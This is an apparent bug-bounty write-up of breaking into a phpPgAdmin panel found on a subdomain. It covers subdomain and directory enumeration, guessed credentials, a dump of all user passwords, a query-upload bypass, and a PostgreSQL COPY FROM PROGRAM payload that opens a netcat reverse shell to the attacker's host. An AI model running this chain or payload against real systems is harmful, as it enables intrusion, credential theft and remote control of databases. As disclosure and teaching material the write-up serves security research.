In first, i found my subdomain using Amass tool.
After i used ffuf tool for brute force the directories and i found an Improper access control: https://subdomain.xxx.com/phppgadmin
There was a page with need to submit credentials, user and password.
I tried some combination of user/password with googling, and thanks to google i found it. And you know? I was IN.
Now i got FULL access on their database, i got all password and username. Admin password and other user passoword. That’s was awesome.
But i never tried to crack some password. I tried to get a reverse shell.
In this moment i got the GUI of phppgadmin and i can execute SQL query.
But wait.. No i can’t! Because query statement block my injection, and only from localhost i can execute the query.
SQL Injection Bypass:
At this point, after too much hours, i notice that i can bypass the query statement just uploading the query via upload button, and you know? The query was correctly execute!!
You can find this exploit in exploit-db with my name: https://www.exploit-db.com/exploits/49736 .
This is the result:
Remote Code Execution:
Ok now that the RCE was DONE! I was trying to get and iShell (Interactive shell) or reverse shell. So i tryind to find with my RCE if there is NC (netcat) on their kernel installed , with command: which nc and the output was /usr/bin/nc.
At this point i just change the payload with my IP and PORT, my payload was: COPY cmd_exec FROM PROGRAM ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [$MyIp] [$MyPort]>/tmp/f’;
And i WAS IN! Got localhost! But i was default user “postgres” .
I notice with “uname -a” that the kernel was vulnerable with a local privilege escalation exploit.
And i notice i can escape from postgres because runs under root.
So i could get root!
Thanks guys! Follow me on Twitter: @0xJin
In the final this was reported: